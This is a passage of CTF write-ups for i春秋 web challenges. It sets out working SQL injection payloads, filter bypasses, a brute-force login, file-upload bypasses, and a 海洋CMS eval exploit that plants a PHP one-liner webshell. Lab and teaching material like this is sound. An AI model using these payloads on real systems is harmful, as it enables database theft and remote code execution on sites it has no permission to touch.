                得到后半部分的MD5值：cfc4337207f|545 self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),1,30))) -- ") Set-Cookie: username="2|1:0|10:1628699758|8:username|156:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsbWlkKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCd8JyxwYXNzd29yZCwnfCcsZW1haWwpIGZyb20gbWFuYWdlciksMSwzMCkpKSAtLSA=|138d344639d775557f79f2fcd8c59e13c4186cd86d56758da3dfd3776bee803a"; expires=Fri, 10 Sep 2021 16:35:58 GMT; Path=/  
                
                 
               
               
              
              
              
              
              
              
               
               
               得到前部分的用户名和密码值：ichuqiu|318a61264482e503090fac
              
              
              
              
              
              
               
               
               用户名为：
               
               ichuqiu ,密码的前部分md5值：318a61264482e503090fac
              
              
              
              
              
              
               
               
               那么组合起来的password的MD5值为：318a61264482e503090facfc4337207f|545
               
               
               
    
              
              
              
              
              
              
               
               
               MD5解密后为：Myxss623
              
              
              
              
              
              
               
               
               输入用户名ichuqiu密码Myxss623，登录到系统
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
                
                
                在文件栏目中显示f13g_ls_here.txt是在该系统中，根据上文的爆出的网站物理路径，那么 f13g_ls_here.txt路径为： /var/www/html/f13g_ls_here.txt  
                
                 
               
               
              
              
              
              
              
              
               
               
               既然知道网站物理路径，那么可以通过load_file读取
               
               f13g_ls_here.txt内容:
              
              
              
              
              
              
               
               
               self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select load_file('/var/www/html/f13g_ls_here.txt'))))#")
              
              
              
              
              
              
               
               
               Set-Cookie: username="2|1:0|10:1628700614|8:username|120:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBsb2FkX2ZpbGUoJy92YXIvd3d3L2h0bWwvZjEzZ19sc19oZXJlLnR4dCcpKSkpIw==|9e10f83afcbc71c66f93440c17ace8b401bc48fa1bec1b8cf5c77bfd64f794fd"; expires=Fri, 10 Sep 2021 16:50:14 GMT; Path=/
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               获取到falg的前部分：
              
              
              
              
              
              
               
               
               flag{dca268c8-bfc7-4382-aa25-35
              
              
              
              
              
              
               
               
               self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,mid((select load_file('/var/www/html/f13g_ls_here.txt')),28,60)))#") Set-Cookie: username=2|1:0|10:1628700882|8:username|132:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsbWlkKChzZWxlY3QgbG9hZF9maWxlKCcvdmFyL3d3dy9odG1sL2YxM2dfbHNfaGVyZS50eHQnKSksMjgsNjApKSkj|5c16fe54b971dc0ac5907abaf734eecbbab60aa790c77c8a5f37a8ef85f3ee4e; expires=Fri, 10 Sep 2021 16:54:42 GMT; Path=/
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
                
                
                获取到falg的后部分：  
                
                5-359f21c017bd}  
               
               
              
              
              
              
              
              
               
               
               最终flag:
              
              
              
              
              
              
               
               
               flag{dca268c8-bfc7-4382-aa25-
               
               359f21c017bd}
              
              
              
              
              
              
               
               
               题目名称：再见CMS
              
              
              
              
              
              
               
               
               题目内容：这里还是有一个小脑洞
              
              
              
              
              
              
               
               
               题目writeup:
              
              
              
              
              
              
               
               
               启动题目场景，获得靶场网站，页面报错了网站的物理路径
               
               /var/www/html/
              
              
              
              
              
              
               
               
               http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               通过whatweb在线cms查询靶机网站的CMS指纹，可以查询到该系统使用的CMS是奇博CMS
              
              
              
              
              
              
               
               
               http://whatweb.bugscaner.com/look/
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               通过御剑目录扫描工具，发现系统中存在flag.php
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               通过百度搜索奇博CMS的漏洞，发现历史漏洞中存在SQL注入，这里可以参考：
               
               
               https://www.2cto.com/article/201501/365742.html
              
              
              
              
              
              
               
               
               先注册一个用户test
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               记下自己的uid，以便一会更新数据,在个人信息的链接地址的UID中可查询到，这里我的UID值为3。
               
               
               
    
              
              
              
              
              
              
               
               
               http://badea0fa60b044d59413aeddf7524d450e8b165442834484.changame.ichunqiu.com/member/homepage.php?uid=3
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               查看数据库版本信息
              
              
              
              
              
              
               
               
               http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/userinfo.php?job=edit&step=2
              
              
              
              
              
              
               
               
               post:
              
              
              
              
              
              
               
               
                truename=root%0000&Limitword[000]=&email=root@backlion.org&provinceid= , address=(select version()) where uid = 3 %23    //注意uid值
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                 
                http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/homepage.php?uid=3 
               
               
               
               
                
                
                 
                
                得到数据库版本信息：5.5.35-1ubuntu1  
               
               
              
              
              
              
              
              
               
               
               查看数据库用户：
              
              
              
              
              
              
               
               
               http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/userinfo.php?job=edit&step=2
              
              
              
              
              
              
               
               
               post:
              
              
              
              
              
              
               
               
               truename=test%0000&Limitword[000]=&email=root@backlion.org&provinceid=,address=(select user()) where uid=3%23
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/homepage.php?uid=3 
               
               
               
               
                
                
                 
                
                得到数据库用户名为：youleUserl@localhost  
               
               
              
              
              
              
              
              
               
               
               查询表名：
              
              
              
              
              
              
               
               
               
                
                 http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/userinfo.php?job=edit&step=2 
               
               
               
               
               
                
                 post: 
               
               
               
               
               
                
                 truename=test%0000&Limitword[000]=&email=root@backlion.org&provinceid= 
               
               
              
              
              
              
              
              
               
               
               , address=(select group_concat(distinct(column_name)) from information_schema.columns where table_name = (select distinct(table_name) from information_schema.tables where table_schema = database() limit 1) ) where uid = 3 %23
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 得到表名为：id,username,password,Email 
               
               
              
              
              
              
              
              
               
               
               通过load_file读取
               
               /var/www/html/flag.php内容
              
              
              
              
              
              
               
               
               http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/userinfo.php?job=edit&step=2
              
              
              
              
              
              
               
               
               post:
              
              
              
              
              
              
               
               
               truename=test%0000&Limitword[000]=&email=root@backlion.org&provinceid=,address=(load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)) where uid=3%23 
              
              
              
              
              
              
               
               
               根据上文可知flag的路径路径为：/var/www/html/flag.php,load_file函数里面那一串十六进制数字代表/var/www/html/flag.php
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               查询源码，发现flag内容
              
              
              
              
              
              
               
               
               view-source:http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/homepage.php?uid=3
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 最终flag: 
               
               
              
              
              
              
              
              
               
               
               flag{b60be290-d90e-4b72-8763-83ae2357e933} 
               
               
               
     
               
               
               题目名称：SQL 
               
               
               题目writup: 
               
               
               启动题目场景，获得靶场网站，访问网站，页面显示flag{在数据库中} 
               
               
               http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 
               
               
                           
                
                
                 
                 
                 
                
                
                
                
                
                
                 
                 
                 测试and 1=1和and 1=0，页面都显示相同内容，证明and被过滤了。
                
                
                
                
                
                
                 
                 
                 http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 and 1=1
                
                
                
               
               
                           
                
                
                 
                 
                 
                
                
                
                
                
                
                 
                 
                 又测试or 1=1和or 1=0，页面都显示相同内容，证明or也被过滤了。
                
                
                
                
                
                
                 
                 
                 http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 or 1=1
                
                
                
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 使用字符&&和||分别替换成and和or，页面显示不同，证明存在注入漏洞 
               
               
              
              
              
              
              
              
               
               
               http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 && 1=1
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 || 1=1 
               
               
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 用order by测试字段数，发现order by也被过滤了。 
               
               
               
               
               
                
                 http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 order by 1 
               
               
               
               
                
                
                 
                
                经常大量测试，发现可以使用<>绕过  
               
               
               
               
                
                
                http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 o<>rder by 1 
               
               
               
               
               
                
                 这里需要注意or<>der隔开是不对的，因为or又是一个被拦截的字符 
               
               
               
               
                
                
                 
                
                可以查询到有3个字段 http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 o<>rder by 1 通过union select查询字段的回显位，发现 union select也被过滤了 http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 union select 1,2,3 这里同样用<>绕过，可查询到字段回显位在2位置。 http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,2,3 查询数据库名  
                
                http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,database(),3  
                
                可得到数据库名为：sqli  
               
               
               
               
               
                
                 查询表名 
               
               
               
               
               
                
                 http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,table_name,3 from information_schema.tables where table_schema='sqli' 
               
               
               
               
                
                
                 
                
                得到表名为：info( 猜测flag在info表中)和users  
               
               
               
               
               
                
                 查询字段名： 
               
               
               
               
               
                
                 http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1   un<>ion  se<>lect 1,group_concat(column_name),3  from  information_schema.columns  where table_name='info' 
               
               
               
               
                
                
                 
               
               
               
               
               
                
                 得到三个字段名为：id,title,flAg_T5ZNdrm 
               
               
               
               
               
                
                 查询 
                flAg_T5ZNdrm字段的内容，可获得flag内容 
               
               
               
               
               
                 
                http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1   u<>nion se<>lect 1,flAg_T5ZNdrm,3 from info 
               
               
               
               
                
                
                 
                
                最终flag:  
               
               
               
               
               
                
                 flag{d6f827ac-3b39-4878-a6a9-77829ca6ed93} 
               
               
               
               
               
                
                 题目名称： 
               
               
               
               
                
                
                题目内容：12341234，然后就解开了  
               
               
               
               
               
                
                 题目wirteup: 
               
               
               
               
               
                
                 启动题目场景，获得靶场，访问网站，发现页面正在加载 
               
               
               
               
               
                
                 http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php 
               
               
               
               
                
                
                 
                
                然后查看源代码，发现有注入long.php?id=1连接 访问 login.php?id=1链接，可以正常显示，测试sql注入发现不行。  
               
               
               
               
                
                
                http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/login.php?id=1 
               
               
               
               
                
                
                 
                
                这里对其靶机网站目录进行扫描，发现有index.php和login.php以及config.php  
               
               
               
               
                
                
                 
               
               
               
               
               
                
                 其中config.php页面打开是空白 
               
               
               
               
                
                
                 
                
                访问index.php页面，发现有跳转，这里对其进行抓包，发现会直接跳转到b68a89d1c4a097a9d8631b3ac45e8979.php页面  
               
               
               
               
                
                
                 
                
                打开 b68a89d1c4a097a9d8631b3ac45e8979.php页面，又继续抓包分析,有一个隐藏页面进行请求b68a89d1c4a097a9d863lb3ac45e8979.php(这里1变成了L),在进行请求，响应页面跳转到302，同时又隐藏了  
               
               
               
               
               
                 
                页面 l0gin.php?id=1，真正的是这个页面在请求。 
               
               
               
               
                
                
                http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php 
               
               
               
               
                
                
                访问 l0gin.php?id=1链接，发现有内容的页面，可能这个页面是存在注入  
                
                http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=1  
                
                测试and 1=1和and 1=0，发现都被过滤  
                
                经过测试 and '1 和and '0，可绕过，并且页面不同，可判断该页面存在注入。  
                
                http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=1' and '1  
                
                http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=1' and '0 测试闭合符号#，发现#符号被过滤了 测试闭合符号--以及%23(# url编码)可成功闭合。 查询字段,发现存在2个字段  
               
               
               
               
               
                
                 http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=1' order by 2%23 
               
               
               
               
                
                
                 
                
                查询字段回显位，发现逗号被过滤了，不能进行含有逗号的Sql查询语句  
                
                绕过逗号过滤，可以使用join 联合查询语句进行绕过  
                
                查询数据库名和数据库版本  
                
                http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=-1' union select * from (select database()) a join (select version() ) b %23  
                
                得到数据库名为sqli以及数据库版本：5.5.50-0ubuntu0.14.04.1  
                
                查询表名  
                
                http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=-1' union select * from (select group_concat(table_name) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23  
                
                得到表名为：users  
               
               
               
               
               
                
                 查询users的字段名 
               
               
               
               
               
                
                 http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=-1' union select * from (select group_concat(column_name) from information_schema.columns where table_name='users') a join (select version() ) b %23 
               
               
               
               
                
                
                 
                
                得到字段名为：id,username,flag_9c861b688330  
               
               
               
               
               
                
                 查询字段内容，可获得flag内容 
               
               
               
               
               
                
                 http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=-1' union select * from (select flag_9c861b688330 from users) a join (select version() ) b %23 
               
               
               
               
                
                
                 
                
                最终flag:  
                
                flag{2281c183-a611-4569-8e88-8e1bace4d9a5}  
               
               
               
               
               
                
                 题目名称：123 
               
               
              
              
              
              
              
              
               
               
               题目内容：12341234，然后就解开了
              
              
              
              
              
              
               
               
               题目witeup:
              
              
              
              
              
              
               
               
               启动题目场景，获得靶场网站，访问网站，发现是一个登陆页面
              
              
              
              
              
              
               
               
               http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/login.php
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 查看源代码，发现注释中包含用户名都在user.php中，且用户名的密码是密码+出生日期。 
               
               
              
              
              
              
              
              
               
               
               view-source:http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/login.php
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 通过御剑目录扫描工具，发现存在flag.php和user.php.bk文件 
               
               
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 访问user.php.bk文件，可直接下载文件到本地，并查看其内容，发现都是用户名字典。可将该文件当作字典 进行爆破。 
               
               
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 登录系统，输入任意用户名和密码，并对其抓包，这里对用户名和密码进行爆破。由于 
                密码是密码+出生日期，这里出生日期从1990开始fuzz 
               
               
               
               
                
                
                 
                
                添加字典，也就是那个备份文件  
                
                成功爆破出用户名lixiuyun，密码lixiuyun1990  
               
               
              
              
              
              
              
              
               
               
               输入爆破成功的用户名和密码，可登录系统，但是现实是空白的
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 查看源代码，发现注释中存在漏洞需要去掉，这里是去掉注释，我们将其复制保存到本地为file.html 
               
               
              
              
              
              
              
              
               
               
               view-source:http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 file.html修改后的内容： 
               
               
              
              
              
              
              
              
               
               
               <!DOCTYPE html>
              
              
              
              
              
              
               
               
               <html>
              
              
              
              
              
              
               
               
               <head>
              
              
              
              
              
              
               
               
                   <meta charset="utf-8" />
              
              
              
              
              
              
               
               
                   <title>个人中心</title>
              
              
              
              
              
              
               
               
               </head>
              
              
              
              
              
              
               
               
               <body>
              
              
              
              
              
              
               
               
               <center>
              
              
              
              
              
              
               
               
               <form action="http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/" method="POST" enctype="multipart/form-data">
              
              
              
              
              
              
               
               
                   <input type="file" name="file" />
              
              
              
              
              
              
               
               
                   <input type="submit" name="submit" value="上传" />
              
              
              
              
              
              
               
               
               </form> 
              
              
              
              
              
              
               
               
               </center>
              
              
              
              
              
              
               
               
               </body>
              
              
              
              
              
              
               
               
               </html>
              
              
              
              
              
              
               
               
               
                
                 首先正常访问登录后的地址： 
                
                http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/，并获得cookie值  
               
               
               
               
                
                
                然后本地访问 file.html，上传一个.txt文件，抓包拦截，并带上获取的cookie值，发送请求，发现只允许上传图片文件。  
               
               
               
               
                
                
                 
                
                接着上传.jpg发现文件名不合法  
               
               
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               文件名修改为test.jpg.php发现文件名不能包含php
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               之后我们再尝试 php2, php3, php4, php5, phps, pht, phtm, phtml等 php的别名,最后得到pht或者phtml不会被过滤,可上传成功，并返回了一个路径/view.php 
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 访问view.php路径， 
                得到提示通过file进行传参 
               
               
               
               
               
                
                 http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/view.php 
               
               
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               访问
               
               view.php?file=，发现filter "flag"显示过滤了flag关键字
              
              
              
              
              
              
               
               
               http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/view.php?file=
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
                
                
                直接双写 flaflagg绕过，试了半天flaflagg.php，最后把.php去掉就得到flag了  
                
                访问 view.php?file=flflagag可成功读取flag内容  
                
                http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/view.php?file=flflagag  
                
                最终flag flag{284d0d78-c90d-47bd-940b-a713f20749e7}  
               
               
              
              
              
              
              
              
               
               
               题目名称：Test
              
              
              
              
              
              
               
               
               题目内容：善于查资料，你就可以拿一血了 
              
              
              
              
              
              
               
               
               writeup:
              
              
              
              
              
              
               
               
               启动题目场景，获得题目靶机网站，访问网站，发现网站是一个海洋CMS系统开发的
              
              
              
              
              
              
               
               
               http://9e3dca6048414f28b84aebff6615aaf412179ee984524170.changame.ichunqiu.com/
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 通过百度搜索海洋cms历史漏洞可知，得到一个搜索的任意代码执行漏洞，poc: 
                search.php/?searchtype=5&tid=&area=eval($_POST[bk]) 
               
               
               
               
               
                
                 这里直接访问以下链接，可远程加载一句话木马 
               
               
               
               
               
                
                 http://9e3dca6048414f28b84aebff6615aaf412179ee984524170.changame.ichunqiu.com/search.php/?searchtype=5&tid=&area=eval($_POST[bk]) 
               
               
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
                
                
                这里通过蚂剑链接一句话木马  
                
                并通过命令终端搜索falg,命令：find / -name "*flag*"，发现没有任何相关的flag信息  
                
                 
                
                猜测flag可能在数据库中，这里需要链接数据库，前提是需要找到数据库连接的用户名和密码  
                
                而这些信息是在data/common.inc.php文件下存在数据库的配置内容。  
                
                通过蚂剑本身自带的数据库管理工具链接数据库 并在seacms数据库中的flag_140ad230d8cb表中的flag字段中存在flag的信息，这里执行字段中的语句，即可获得flag内容 最终得到flag:  
               
               
              
              
              
              
              
              
               
               
               flag{1603d032-add0-424b-8b11-df64d0e4ebb2}
              
              
              
              
              
              
               
               
               题目名称：Login
              
              
              
              
              
              
               
               
               题目内容：加油，我看好你 
              
              
              
              
              
              
               
               
               题目writeup:
              
              
              
              
              
              
               
               
               启动题目场景，获得靶场网站，访问网站，发现是一个登陆页面
              
              
              
              
              
              
               
               
               http://861cde64ed424097a53639737ae67efabab9eb44763844b4.changame.ichunqiu.com/
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 对靶场网站查看源码发现注释中有test1 test1，猜测是用户名和密码 
               
               
               
               
               
                
                 view-source:http://861cde64ed424097a53639737ae67efabab9eb44763844b4.changame.ichunqiu.com/ 
               
               
               
               
                
                
                 
                
                输入用户名 test1和密码test1，可成功登陆到 member.php后台页面，发现没有可利用点  
                
                http://861cde64ed424097a53639737ae67efabab9eb44763844b4.changame.ichunqiu.com/member.php  
               
               
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 并查看源码，也没哟发现可利用点 
               
               
               
               
                
                
                 
                
                继续访问访问 member.php页面，并通过bupsuit抓包，发现在响应页面的http响应头中出现了可疑的show: 0  
                
                http://861cde64ed424097a53639737ae67efabab9eb44763844b4.changame.ichunqiu.com/member.php  
                
                这里将 show: 0 添加到http请求头部中，并发送请求,在响应页面中并没没发生变化和可利用点 这里修改为 show: 1 添加到http请求头部中，在响应页面中出现了php的源代码。  
                
                得到php源码：  
                
                Hello admin, now you can upload something you are easy to forget 示要构造post方式上传filename和data。(有很多工具可以使用，如Firefox的hackbar插件和burpsuit)利用burpsuit抓包并修改为POST上传，添加 filename项和data项 filename=flag.php&data=<?php phpinfo();?> 页面会报错"No No No!", 因为网页做了正则匹配过滤. 而用data[]=的方法，把data从字符串变成数组，可以绕过正则匹配的过滤。 用data[]=的方法，把data从字符串变成数组，导致绕过正则匹配。 上传之后能够发现它返回了文件的地址，访问它就得到flag 发现回显为no no no,想到data可能是用一个数组存取的内容,抱着试试的想法将data改为data[]其他内容不变(filename和data的值不重要)。回显一个文件地址，将地址打开出现答案：flag{} filename=flag.php&data=[] 得到： ./uploads/3de8e9b787288c751bf7b0291b028fbaflag.php http://106.75.72.168:2222/uploads/3de8e9b787288c751bf7b0291b028fbaflag.php <?php%20eval($_POST['cmd']);%20?> 得到： ./uploads/47013ce8d33835e50cd0f97565cb7172flag.php http://106.75.72.168:2222/uploads/47013ce8d33835e50cd0f97565cb7172flag.php 最终得到flag: flag{e07cd440-8eed-11e7-997d-7efc09eb6c59} 题目名称：phone number 题目内容： http://106.75.72.168:3333 Phone number is a good thing. 题目writup: 访问题目场景，发现是一个登陆页面，并查看源码无果。 http://106.75.72.168:3333/login.php 这里按照正常流程，先注册一个账号： 用户名bks,密码123456，手机号码：131288353391 登录系统，点击check 返回了信息： There only 2 people use the same phone as you 通过 f12元素审核查看源码，发现注释中显示"听说admin中的手机号码藏着秘密，告诉我们flag 就在admin用户的phone字段. 用户注册，尝试用户名和手机号码都加单引号，提示手机号码必须是数字 联想到会不会服务端验证phone 用了is_number 这里注册一个用户ss' ，密码123456，手机号码：hex(13128835391)为十六进制：0x3133313238383335333931 果然如此,点击check,返回：db errror(sql错误) 应该是有注入的，结合上文中的注释提示，应该是注入出admin的电话号码即可得到flag，所以phone应该是利用点，要想办法得到admin的phone。 但是phone处只能输入数字，可以将sql语句转化为16进制。 查询字段回显数： 注册一个账号ts ， 密码123456， 手机号码：hex(13128835391 order by 1 #) 为十六进制:0x313331323838333533393120206F7264657220627920312023，并抓包发送请求包(手机号码字段前段有长度限制，这里用抓包拦截发送请求绕过前端手机号码长度限制) 登录系统，点击check,返回： There only 1 people use the same phone as you 注册一个账号ts1 密码123456， 手机号码：hex(13128835391 order by 2 #)为十六进制:0x313331323838333533393120206F7264657220627920322023 登录系统，点击check.返回：db error! 说明字段只有一个字段位回显 爆数据库名： 注册一个账号ts2 密码123456， 手机号码：hex(13128835391 union select database()#)为十六进制:0x31333132383833353339312020756E696F6E2073656C656374206461746162617365282923 登录系统，点击check.返回： There only 3 people use the same phone as you There only webdb people use the same phone as you 得到数据库名为：webdb 爆表名： 注册一个账号ts3 密码123456， 手机号码：hex(13128835391 union select group_concat(table_name) from information_schema.tables where table_schema='webdb'#)为十六进制: 0x31333132383833353339312020756E696F6E2073656C6563742067726F75705F636F6E636174287461626C655F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D2777656264622723 登录系统，点击check.返回： There only 4 people use the same phone as you There only user people use the same phone as you 得到表名user 爆字段名： 注册一个账号ts5 密码123456， 手机号码：hex(13128835391 union select group_concat(column_name) from information_schema.columns where table_name='user'#)为十六进制: 0x313331323838333533393120756E696F6E2073656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D27757365722723 登录系统，点击check.返回 There only 6 people use the same phone as you There only Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv, File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv, Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin people use the same phone as you 得到字段名，有用的字段为:User,Password,id,username,phone 爆字段内容 根据注释中admin的电话藏着大秘密，我们查询username为admin的电话 注册一个账号ts6 密码123456， 手机号码：hex(13128835391 union select phone from user where username='admin'#)为十六进制: 0x31333132383833353339312020756E696F6E2073656C6563742070686F6E652066726F6D207573657220776865726520757365726E616D653D2761646D696E2723 登录系统，点击check.返回 There only 7 people use the same phone as you There only flag{6dd303b0-8fce-2396-9ad8-d9f7a72f84b0} people use the same phone as you 最终，得到flag: flag{6dd303b0-8fce-2396-9ad8-d9f7a72f84b0}

[http_eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com]: http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/
[0c3009e58b4e8b7622e7827613251a78.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/e51b712055da4f07964ec760b3f1f2c6.png
[ab54e9bca687ad3e3c5821feb2ca4e01.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/6730d6a323964b14a447b7fe60aeccad.png
[82d4b343de24f7757eadfad42abe2c43.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/9e5d5a1e755c4d56bed8aec1d5db0cba.jpeg
[0d19530229834589dc1309680242ee32.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/679f0948eec344359af1d7ca3670d8de.png
[c849ba3c485d1146c7fcf44d364eeefe.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/ca0cf355dc134ca9b2e6993045ac1ae5.png
[acc8ff108ff03be8dcadb6f82e6b73d2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/5c8fd3f3b138452d91c7d9af5da32150.png
[e6c05d04408d681057072e8d1311d58b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/b19709d2c1cb489681da0ac5a2671536.png
[99b260c28d47807d3cb20e4a29a30135.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/38f134e4a2924099ba5325cddaf52034.png
[5f4556a1a7dfa6b1ae12da4d990e96ec.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/99c2691f54c5498cbfeeec3f8876f521.png
[511235b7e4b741284d67cf8ae58163c6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/93bd2df5af4542bf9707fba5c77dda95.png
[a9a066cb4e25792f9db87bdc2eec6102.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/2f0faa2714fb438ba7193017d67f4c3a.png
